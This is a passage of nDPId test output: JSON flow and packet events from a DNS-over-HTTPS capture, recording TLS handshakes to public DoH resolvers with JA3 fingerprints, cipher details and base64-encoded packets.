mqKBz9tPtGNCG6XGCZWhEY3FFyS9rmcTpceJwTCfQYlzYKZslhMKd4J63ankp0RnGQLgodwM35ISK98+Kq2hNOJCTBOCxPPsHuXjZuhXdIi8QCW9VQZqww\/\/NjZPMOPy4jcZ7Tkixh7\/JmbpMEV7PnrhAXh21z+u5dLFH52pKdwGRat6A94UDcInit5rOcJtblnF8P7F8IlQqF3WFZurZBuXzllHTzbwe54UUGPwrqwyOIUkW6zUYU\/09YfhXdyYwY1MnGRAlrE9sPr4V9Vgn7ZntvhQgmKz\/jiHNHuRGaj\/PJAjEPTmoQib9SfYaA5fyYDQmsautNL\/cJ4oyfD9Jembyctib1BIp9Ramfe6PSsBXI\/0Ka52Or"} -00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739298533,"flow_last_seen":946739298797,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":1693,"flow_avg_l4_payload_len":846,"midstream":1,"thread_ts_msec":946739298797,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-02292{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":946739298797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1408,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1408,"pkt_l4_len":1374,"thread_ts_msec":946739298797,"pkt":"ZmZmZmZmRERERERECABFAAVy1TFAACsGSuyLY95ICgAAAQG70arq+8YweX\/bslAYAfkcrQAAThemFBuD34j0ZojpR7nDk08tEILyrSrE7HS0zZ4kmhXJJxPvCajO9mPz0f1Ba7CUeJZuC\/ww3Lrn+zD28CW1o9VT3LiWNj\/tk7IhVjR3oxyzXVyp8GIUKoCq+rFgLmVNv3t4E9NSsp0vzaP0F7j0JBrlPSojRxE2tlZsJ5feSSYzKGVucsWX6pYRquGlpuPfdHODx0L8ifTKNZ7sMGSXufTYU71W7zucIJWTJn92oiP3KQmXtYYb39SlVhRkoPmox0CcWIbUIkPk1mOfiZj7ZHZGdjmSkO+stoE+mAIy1qeh6xhTg7nyjAGvTt0OEbSBbL64py0gHtL8p9MnYDH\/rEu94PzROteC\/nq08LwZZof+0aydUgoyNJpYIzziL6obgZ8r3XFfT2yBZeGRYlK+7j980Fzg4IJlxXjB\/7u4t3CFM2KzwkVTOl0QgQ2WdVMZr63UzYIuBqVeqhjDwph8EAIPfj6GHii36awX1ARUIn+i2we8pqEICyjrrtz5abqrvBqhOgUymt9799jpjN96PN89rSa+qz8R5hSWva8Z0q12NMSUqK4V32q2T+XbFuVZUlGqNPo8Q4LGFZXuYD0rXuNudeUYIvyeE2j5uqdZqZHCJg4amyAZz0RTts0c1\/NYqX2y5hPaOLvInAlZn4kgRx8P3JUIFzzVPNJJ35uuAChT5mattKXxu8qwume7sBZMgcO4xIk9V0GeDf7Q0iqbxG1cZybv7JIhiCiaIbji819I0oDOejGbK2XffVEsRj3+LURpVM8fUmFAk669Ff\/Nr+yt6tH9Ktz6qOevm0rhgviDIUwzLNJNTxk3pvt9wNVus\/LUfcLiMKspToabUtDV2KtFlgjUQBZ6M603sQeMbcyD6v4zye6TReEZisbYDNmcge+IFl+e+6gIZYcwnBnjL+IMuKODuiRDaCLQJS72LiQoTClqyWNhk8p3nZX4LJsLVi6dW6cV7ErhFynQJtxWGrvo9DrmvbJGRV80Ul449jTrc22WvgTBKnaXTTsv2pw69IL3ziatAlwA6VUKivZyuSnP\/qeqQsLIM3h1xsud7x+raSQILbisV46QaEMOKNMhEo4f9EE5vYtzwm\/ngKP6CEyyxa5eOnqoj72FpXRNgDKcpbuNQSddL+rkopq\/y8uRR5TATut5xq9zEjEQLnRu3bhaqmLH7wPAre5tejGNaBElH9ZorCCzrnrfL+5ZFV65djnMn\/burxQW9SIIOlDcRe3ddZxIf\/z8dXGWfc\/YJ2alVKWABNBLcFPeFubCnDOGFnp7WaEezUQCo1huX1d\/AR2t9ZFIxb+\/2YA0Fcu4FFOucBmHB64h34YnG1QktWj0QN6yNlW1E24ubX3xPextdjh4av9ufsqLyV+lQC34GqCFKa3D2btbNVuYlf3F\/nsdPHHCRn+svJvZKssoO39MnIg20E8\/NZSYgAW7+dMxM2JbTCDpQf718V5e42Tcc3D\/MVuwLpSLFUnGgbahF3PvczhUvo5QFk5tF0YRiH+1QJX+P
4Bld+SLzREBNKhff3\/yg9uJJKca+U+6nBcDAwCBaMxAcfS4h68NX8O4\/JsJCa+QWF87yNO9r0+szCZ1TeWGW\/KMvQNFzX1G+Y2PEnQ68hI4LpJQIC4VjBdW13rCggF8QR46NY3HL4enM7oteZTlqkQvxVphVmRyDsYFcjY4u2fGUw5LFrsQktQhx2VsQTygsXipX2KtdmPdscHLlgGRFwMDADV5C7WBlZ+ocDTA\/zppOjhaktsCXwO0sG+1hu0Zi0K+GaWwxXTJGdG0p2vdDlGf4dOI0eNxTQ=="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299058,"flow_last_seen":946739299058,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739299058,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00839{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":946739299058,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739299058,"pkt":"REREREREZmZmZmZmCABFAAFDIvZAAL0Gb1YKAAABi2PeSNGsAbu+7R6jIfk4pVAYAfYrngAAFgMBARYBAAESAwOSQ8JxHhGuu6wLKnGtwDfaCU9fn2zkXyLvCqG6Z1EJrSA97l3xa4NDBUHApuStJw5z26JVCZKgohlNqcovRpE62AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG9oLTIuc2VieS5pbwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACBvduxHcveHyzSwUHe1UMoR3WO30Q1YJASO6Gqd5f5rOQ=="} 
-00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299058,"flow_last_seen":946739299058,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739299058,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02367{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":946739299325,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":946739299325,"pkt":"ZmZmZmZmRERERERECABFAAWq+oRAACsGJWGLY95ICgAAAQG70awh+Tilvu0fvlAQAflBFAAAFgMDAHoCAAB2AwO4E1L4A\/\/vaa3qFy7zGtkSllYVpFARFReL8E9wQ5edfiA97l3xa4NDBUHApuStJw5z26JVCZKgohlNqcovRpE62BMBAAAuACsAAgMEADMAJAAdACC6hi7aKoaulrg0kHVy9iX3JtIXsjOWFqMY4JtXoR3ZFBQDAwABARcDAwAkVn7ui3VtyEjBPho8csX4cWU91LDHlldd37yMDuMkm1WrNSA\/FwMDCVkNxERPpxFp1hU3MTygH94nI+uO3MFA6Pgc7Cjgsqv9R94L1LzqnlTJ9qM2GdC3DoaCFMZy2rvnd3TUb44js1wH\/ZjR\/tueYjuCchsydXsjOJIItHXpv6rNdoQc5GxilmSN3ZLV0BdssW6zhxxgQaE3FYajxWXTTfgzUzOS+6W++jmvd1q00zg+8Q0qSguzfNUtyikLzjXqF591w71tmw1RwueDWDRqOR8D9ArOOASC\/gfHKocbf3MYoPn\/L3+LeyjDo7Dan2mPuEUKlItjagedNzassvjfnCKDfWzjTYX1Oj074zzZKYUi326SCBVqvZ4BTAJFklyVRE2\/7w5a9Hu3TkucSU4uD6YDgHvYuwr1PUeuJlpLcTtMIe6KqdQO6
VhykmmEfKtsuoqKDau0V16KSQWM2aCvsVesKQ3DSQJg5rL5yIwj9vpyWnaHxDEgfEIDmYjy\/Axgsm7vfVWFF3Jrfc1xzCpgVx2Wzxxl\/maZOzNTYwZUTU3hLDZjHHXTyifvb45snBjXrLw3E9kNt6T2lmZ7d2lzBq35OqiFyiqDdqg5nN+wvKg6FFTseFXwn\/Cnava4JqwJeCYBLZwtvjbxpmY\/Z7bzc6mZPg2Sh+dbDSkCl3bi0C7OGN4lTKk6SakWyrfvl60M9dBFHVDrzgKu7xbDvPEvSNcZq2Dx1QXy2oMyLZnD977uZ9nLe2MaP79hLJNgy4v+jriXtA5fuVRTABndd0eLGpCNoQRcyQEasclWVE0X3djEYjD5W2s+8ID+COBoWOoyP\/WAq9bDmdFuLbZL5YcQMg6OEX37+6VcGXh24mzLjiWqRW2SXZBECP5e9Kp+qBc4nsLJy+\/cCFFzWnnOIeDNkPzITjeYYG62LLpDcjihxenHjNkU8aI6W9z7HJRAKXj15JybI7ZavgKdsyBJSz8Rv17E9WgwJgE24FqtNa6LcXPjCIVJ4JA\/FRIvlJbq2\/PV2grzaPllz7EIQXESn4AAbsSK6v\/afg1rifhsSGv2yYjxwtRB5P9D+FT0dFjO2m9zDYEYLvFPNAv2\/uEF0d+ML9zrDfaDdz6z+wzZI7tOXb+ZgoELySqXWnZpXCKfAbAaRdkBWG9n\/7DEkPQfGc3BRuxecF3gZRN5TjRNnS3L\/z3Mjd0kgq5NvuPBzwr++r8PkzDyv4SrhrEho0ZXiTGQlO7AUNavDHJ2E6WcvB6wH6w+nDu+LafkJwVBrA3g2ry2AgWQYQlCtuH3p4tS5epl0vy3sOsnzjbAIulHq4VIitq5pO3s+sczN2QL3hoGMgZmvfNYCCppei2sMRM3JeTXdDamDavAss5ffhc7o9sFzFOhYwBHF3K+RDvF+\/0hY+kvloFXPT7w5qyKb029c\/+Vu3kK8iCqQMpkd\/Y7fPVoDJRSebia6NkOtp0QF10Wqdh2s0768F9ux8l3ns6Ahcvm\/CEcnhylTvqF1H8nFLoIPnLNfkqliriwfEB7qB8aB8psWMvXozj1u+xw79vKaBVDClx5kPg1ndY1UZCkXuVmLOZwvxWWc0tuTJcMVug1lNwCPKGUEoQ6IRWLIe8NCbqmkI6bW\/5Xu20soyB9iTbKgsh2xLBekpYgVl8gT8VGJflOjydyD64I9+T\/dXz5zy\/0oPQP9q2vSa5j"} -00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739299058,"flow_last_seen":946739299325,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":1693,"flow_avg_l4_payload_len":846,"midstream":1,"thread_ts_msec":946739299325,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02291{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":946739299325,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1406,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1406,"pkt_l4_len":1372,"thread_ts_msec":946739299325,"pkt":"ZmZmZmZmRERERERECABFAAVw+oVAACsGJZqLY95ICgAAAQG70awh+T4nvu0fvlAYAfmmIAAAiW51QuqEfobYElojzNdmal3NmvuNd\/aotOFuZKIcd+01MY62EHH7E56\/oxK0qr9J58d7Jfc491vr3AkBsKJZSE5EN1LMlpXioNrse464nnbj5nYCt1y8iJtaYVHfHT9x8ujbG\/T2N6ZekRm+ONP3O7xw3rubgw7ubQJF\/KHEiRVFPrbIwq5RI7VTRdfrd3b9Fc\/71kitl8ImBckYsh09FSa2nRQrqALNG43BNA+FPS+D4bALfGJGztFq32s2D2cWRj2vno7VjQQWYQsz+9R40cUHWMbbW0anf7aLopYHYwhAUnxfUJyLSGv\/hcuY1JoGSes4gPPm0w\/KvSPUfmH1XOcuJRdoXdElY5F\/m9je9IUq8euoPyf0PXU\/w6wn+q9PJNYNblwNWPVkVSF6bp87Ycrz+bZvhmrk3ipYYu58\/qf3ItMXsHiYNDHVbyhTOrrT84X2uXkA5ajgilxkHZCWJdDIvRFwT++59P5vI4krRFU0SPX1eygQdMslXLsxvfqQATVp3sK76bt8qHa8rMRVLCfPA3UPe8Z9q\/JNBVvEPCwFBWQICqqCApD7kqMSclaEy89K83LVugXlNfNOargw6YlUR36QNrsco2xSkkpbYZSag+guZDt8NaBOAQqx6Dtx5yS9ZeM2TaZ4Tva3cH5WwTw3nwMfyBrZkmKclliFlyL+l3\/Ft\/1cAhtU5U7a4LgYVbdqsQxRVbeUPAwUZ68y2BGyj5Xg8Mtci4mPsgh+bnyNL5K5y9jSltRS79PDJA87B7hqXTRUrELkxjFWaMPAzghsENt\/UjelVjAgSWUxzpqxPV+2hED3HVp9LJOBmZIcSEVN1eWHazkX+mtW2m+0GAsZaxamutLzgJh\/DRJa7Jw23fjV9PCXnj9MWSdJstPENtBI0OVh7PH0+uAGt1zxMdGzUgBU2QlNOO7S4UuYD0Y26DtfRFNsa3yyMMJMA4d1B+99D0rLBp+YTr6CIQlSGW7\/MY0mGzKXnXLKEBMjIoE76aJQADNrOQ1pUsHUbMNYSxpurIgJZbgBG3OALLoptMECW3PsCTpgXkQ2OmVE11D882PmbdA0f4acC7LQATIGoxF7ZIVK6E9Vi5\/LR0AueJFdtzLq+oc1+GpS8l4A7KvQzJjHl8BFVtlJFp5Ft91g8c86AHAIukg5AmfSwO3K4Rq0SXUs8KcP29aiI1bA7\/K0iAEMbAiDcRNwXEEo+uNEfshUZQDIyZoBHdLzMTL
\/2s9ouLF90mtZTkbub4ko0oHCp0UBuhgnfDbrA69yTnP91yV8UR8xswBSaiV12vmMHeXGGKIJ6dQbgPNn5OzZbyefQz5\/sH6dHxYbcGGfd+8wSxfEi7DokbKnmTmetH85RkCusy06sJkhFgf9bhlEmk63Cet5cz7Z7ea9PrtiS\/xOPZoAmLR8AcrBNB\/tHpNVlFcTM+gO6pHXXYSwt1o+rdQxZT4lFn7kVxmARBzEGQB8TIogOkRi0YtdMrX\/cAGbQWx0wllwfDL\/JIISbxKwUNTT45zepGk3OVcnv0694KsAM6Pujlm7XvrZ+hcDAwB\/JlZfTL2CfKHweE8ivDA\/8Dj4s9MhpgBrmwa3P4sMMqXQFKgI6jQB7iGhbQGftnSVKI+QCxWleTjngiVWQbRq4xwswRPPuCr\/EteohSIpdjvjIjT4EQlykWjN3TxUSVyvVSA8Rp0nUkHXzRzNgRwt1EKIchjIYekan95L5wPtZxcDAwA1P8zjtyfqh9OaAN1qf+msLEHbyvTYhKC4e6LNeICCaSA3aHIsCQ1pZdcK52vQiTVTlBfFsLw="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304432,"flow_last_seen":946739304432,"flow_idle_time":7440000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":946739304432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00864{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":946739304432,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":352,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":352,"pkt_l4_len":318,"thread_ts_msec":946739304432,"pkt":"REREREREZmZmZmZmCABFAAFSUVZAAL0GFwkKAAABuV\/aKsW2AbtqjRCaK20m8FAYAfZViwAAFgMBASUBAAEhAwPqrEqAFBwbSYnmd5FQ4vhXWCXQOM7WSA+ydz5Uq2T7jCDruFBRjE\/ZRtIlov08nzXX8Izc\/f7Ut++FjeF3CgO25wAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACyAAAAIQAfAAAcZG5zLmRpZ2l0YWxlLWdlc2VsbHNjaGFmdC5jaAAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACDBZSA439npt9wjB\/Qij4hgUYqoHU3i8\/GsiDYDjRoMEQ=="} -00917{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304432,"flow_last_seen":946739304432,"flow_idle_time":7440000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":946739304432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.digitale-gesellschaft.ch","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-04390{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":946739304474,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739304474,"pkt":"ZmZmZmZmRERERERECABFAAuA8Y9AADUG9KG5X9oqCgAAAQG7xbYrbSbwao0RxFAQAfVfuQAAFgMDAHoCAAB2AwMcSuw\/xeEh9B9zohSBYXmLCSdYelc0PZguMzAQLdc5lyDruFBRjE\/ZRtIlov08nzXX8Izc\/f7Ut++FjeF3CgO25xMCAAAuACsAAgMEADMAJAAdACA9LiT1RQf61DUAcNgmrd9PJwh2JRIEeJ2AayVwYZe0VRQDAwABARcDAwAkpkFL6pYrY48v\/7oiAzlOAXfNYnXJT5\/VQ9ye3Jhdgfb\/qFcIFwMDDINDI+OvHUF+FRNUcqHGAtixa5OM3ESWY04brG7N5Xjztm8RaH\/MawsGpkLkwKimhVGQ6ciJhhX175QbHhfhLL45mnkevxxrQGot9ty+fzwVg7GUUCbrsUr32l6TD4OY9EXQQSyuoBvDePneEphgFWs2uB\/zEFQxJzZvf194T3VRrMXZftbpf\/YmEhwWBzhFxCXz7FBI47mE4BFAjuyUMEWUzwiwE55sybcBJQIrcz91caVnRcYmA1Wi1qK5uHVbVaqkF1jIcRZS6+N+xmFq9MBtbs1TttpF6z36PG19i1g1CIx8xl4wpaYvqDA7QOoSL5x3PMqBtb0k4c3Q\/zEwDdawR+TYy7hNCaHkQ1sAWum3cmhRVUAXu9xkbB0O3nyNloM3\/1BpKJAhKkuU\/V2kkZGB6Ql\/kS7sAxcWh603OAJFGoXqcwc2spjFNCK4ea9Hs8PmACV\/UTaJ7lrlVw2HKBfFrLZE4S2HECqocWhjyVs89\/VZtJDOJu7pXlvP6vYnAZ+sKU9FZHgQ29hFtZTpOUnFJKyIZ7qR3IrvVPATpVytUzMEEVKArnVXT6TYqqci\/q+Ob0fbpe70cziyO7QaX7DT+VhBEhzijRbBVrFLadSpyh0XwKqeuShTd5lBEg4jq+0xz6QU3AR+JKO5yFNIu3wqn66JM48D8VfHh\/P6zoK25bt+h0uyMx2Tdvz0o8sXcXOlNbkjxJTj+b3L48sroz1OixQLEwkGWR0YALDiDYZDaGEdLMJeKpDENsvWGjQzbcLGtxojF3IPZE5plenMHHam99lQcz7tOMhTuD0tu9K1ubLwoOk+K9ZSx+jQ\/y8OgEHvmzPhQqCD3uYFzKXprY15BXYSgVl4JkFtCc53KhrIqQpwfu8AGb8d7NaM+YwOO8C5+0rvVtZQVjay20f9c8RH+m7E+z6+gghCL2zO42Qf0EGAmfsmAKXMp6WNxCrd7mkU+MupYWwFGBmLvHH3Vl5XVJZL0bTZyhceC5c2NC8KJ3G3fmI41pUyCIqBiCF4naOVVb20hz4J7t7d4+3vNMlh9pkutkDtBUG\/sopbYKTD6kxhRU0nbMYNcJYsotavdtxk+5ricax8dlXTEQUyVGuU7VzQro6ZTS2J\/N+Dqw0JjCzhzZM4Iy+Zigsyz452Mxwn4H+POZW9AEa8UJIqsMXNYUOgxqdRZORU8gjSaaYtyhn4ZgPLYzJWev+UYEVbkQQlIs0qMsnDALKCKs\/vPLbMaZzLaWAeXOQBcQn6dRdSl1OHdjVYou9K0wNLFmi
57+vod9Ufwp9xSCvh3ThgMiLBs9ntZ+DKnnpNK7K++8wDuLBmnbcYEnUZrZqGa8EXM5oLFPSizN87UN+K45Q\/S\/mtl3uxWe3MQN2DDd0vZIT\/pM6xA4vmgKQKhOGh1G\/LsJ4bGVvyfPbVWvvPsPMrkNeqwnVRFRE+JcuPLjNn3DyJRPv6SImnNR3F3p3NDu+U\/bZYbpfAqdtebmwkI6E92\/4EaRwnMS8jUU+nm4J3KxRiQRAHf2ic3MpHIJFU1alZ3UsqHJ6ixFmoZGKJNMub9RVwhhoMDob7lsWG2+BH4aWefcCL1wBXs4NIWJsY2Ws638ztVCok6ObVcpsMJe2l2ribLtt6uLyB1eEKfooGXoxgtbiHn8UI8BDgLRXpCnA7qK7wNCPv\/hXV\/5qObuA7HW\/C2qkSIpV\/R39i9wwVQ1ug1QIQz\/Ivm\/r6WLd0npdZrGVu5GBOJgUSRjnZQS5nqzdQ7xc5efsR5ICHi2XulsD+Zl3WQXVxYViEQMZNQRJCVpPIcx8YSgUINm5M6giDWQvYaHGMiifN+4pLOGo7UDtXSoYcIPou4kTo7mt5yFzAggk8EG0TmExkKN5uy8guvzoGiu3UmP1ayFSZA5TF4Hxgcg+2NpMUwTAvYDD0pW884S8fOW9HXDNECKzwG\/oVVn5NMUQqNCBUKpIkrq4caPrR60LP1G1fKKVz2Mf14oxUS6BYWLwcRFuY6LigPfz3Ch2bE\/jL+itDz+psExENk+g1PfaK4go+YhsmYCnhhZtTocVAIm+qVANsaIE47+Mr\/3qaOf1rseYxdMsxv04vxWH70UAraH7Y4AGe1DhKm55YgPg2VNLv+h443L3JtfuQRH1c2k3TEXhdwCAcDQH9W699eTwV8ntiQTxjZssTXuxQRFgjLr00HeNPNF7n2H9VgT8LsXQAt4\/i29eoQanjq3bUca84pwERHpxJCf8pS1a1KaFzMXvwUcJQOHW0Q\/N1pQGzvCpgH08Dx9GmHQ9KyzJ\/25WSu25QUZfal6F7L79g8iREwvmDUfy2lEv7mGnvWdhk02quVGsRpK9JEZQWo1rmsoDlNw4F7rXwD7R+U4RUfRyKkcbXPHiTg6YeMzcydsycniM9RaMjPPob9n1bk26ufx+9SlvlwwzqBTbOelsik5jIa525vbi5OIQxSrn0plookRa9xUJNwJ0omdn9j\/AW9IsSa86jM4scUrSMFbeKS4NfQDG9J4VYxzdoR7UNco77sa40\/zPWSa52BjRajNWVVhLj2o4JJQ1TdUu1\/Y89xmSzFKfGWeLSDj5A40mFHXGu4ywpzLC8Nndnau8G5aFKzcr\/e\/FYXUsoYZybTLRRgFBh9CldD2TTFeVueuq98o4ZVu+q1YYgsJKBwBBdV7ZQvj9\/cuG60fpzaNEiWJubkXSKKJvv74KXiPSXeDhQYLSS52OcrIzafNPniFrdcohvXMGEBoTJqcVbFo3+5iC13wm4mlmo+quy\/l2iSqCs4wxDhhSbLnO3Mj4Jo+xpM+BWcGCqCQkZM3XVKq9YiLnmUpBqToMdPk8pxszpPKZj1LhkprcBdvtCOBdOnwV08YRjPbT04P1DuRJXM7LDfWyxwk\/Is8GGMA1w6+\/RlaDUJ4QA8kKf62dGdodCfjoiQVkcxdXgak+xv+ho1izHEaG3Cxi3\/0JNNkwi2GYgruxc5fmKOdC4sqtkxC8j7I10mTh3+xdhudUBx0Sfr8yXq66S2KI88KrN3whtG4+sfGtAkvxG1DDMgti4zkfemFnlOATAqP5VRZM6U99yi4VhRBfczJTw1gBFetM1BkbvErs0YQl2nnzhNtTGtufXl2uHH4oKan\/xnak8wRRzvD04JQK431fn3TEvjjqMfQgcgW2JNC7Jyw7AYjY5nB5jUcAvogHpO11F1M9vRMop+cLQefP6yxy73IHNujTUtW4L99fDdjHVHLSrb7JdVLoGFBt3fFHLJFZwGy
i73KaVuA8iLogqAdT6WIlJVQpMEOX0IGn7EhGzmKBzxPYnYlqqEBMEmrbIy10AsTQseVjaAzuWns\/HCPxtq5uB5ayh6r0SQlamctp8CNeSGkejLyD9InFUv\/cN6jEeAPw9ln90Uo+NcJcsUJLeRD+0uBhQVWKlzlgFrsdNHfyZgldWogT0yc5biAQ0YsfjTotPSED4mJ044\/CPZYxO\/WG1WatWJcgbBPZpTJOczqp0KaqRJnQpbibu0vaCcUf\/KqPXTh9mQWbhQvkie6BJSQGOWuxP4jMOKd9ZpnBr0kUhcDeMAPaBISZnWKXpcStlkCGJnAAKL5CAgF\/30XUkXB1LxIrTS74Ar8WfurKCvwBWG\/WZugVENhYI47kxJo12a6YH"} -00960{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739304432,"flow_last_seen":946739304474,"flow_idle_time":7440000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3202,"flow_avg_l4_payload_len":1601,"midstream":1,"thread_ts_msec":946739304474,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 